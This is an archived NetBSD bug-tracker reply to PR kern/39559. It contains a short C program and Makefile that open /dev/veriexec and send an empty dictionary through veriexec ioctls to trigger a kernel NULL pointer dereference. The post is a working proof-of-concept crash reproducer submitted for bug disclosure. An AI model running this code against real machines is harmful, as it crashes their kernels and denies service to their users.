NetBSD-Bugs archive
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index][Old Index]
Re: kern/39559: veriexec(4): too easy to cause a NULL dereference through it in kernel
The following reply was made to PR kern/39559; it has been noted by GNATS.
From: Juan RP <xtraeme%gmail.com@localhost>
To: gnats-bugs%NetBSD.org@localhost
Cc:
Subject: Re: kern/39559: veriexec(4): too easy to cause a NULL dereference
through it in kernel
Date: Tue, 16 Sep 2008 13:35:35 +0200
Here's the example code:
---- Makefile -----
SRCS= verycrash.c
PROG= verycrash
LDADD+= -lprop
DPADD+= ${LIBPROP}
NOMAN=
WARNS= 4
.include <bsd.prog.mk>
---- END ----
---- verycrash ----
#include <sys/verified_exec.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <err.h>
#include <fcntl.h>
#include <prop/proplib.h>
static void
usage(void)
{
printf("%s: load | query | delete\n", getprogname());
exit(EXIT_FAILURE);
}
int
main(int argc, char **argv)
{
prop_dictionary_t dict;
int action = 0, fd, error;
if (argc != 2)
usage();
/*
* All these ioctls will cause a NULL
* pointer dereference.
*/
if (strcasecmp(argv[1], "load") == 0)
action = VERIEXEC_LOAD;
else if (strcasecmp(argv[1], "query") == 0)
action = VERIEXEC_QUERY;
else if (strcasecmp(argv[1], "delete") == 0)
action = VERIEXEC_DELETE;
else
usage();
/*
* O_RDONLY works as well, hmmm.
*/
if ((fd = open("/dev/veriexec", O_RDONLY, 0)) == -1)
err(EXIT_FAILURE, "open");
/*
* Empty dictionary or any with no keys required
* will do the same effect.
*/
dict = prop_dictionary_create();
error = prop_dictionary_send_ioctl(dict, fd, action);
/*
* There's no need to check return value, there wlll
* a NULL pointer dereference in kernel.
*/
return EXIT_SUCCESS;
}
---- END ----
Home |
Main Index |
Thread Index |
Old Index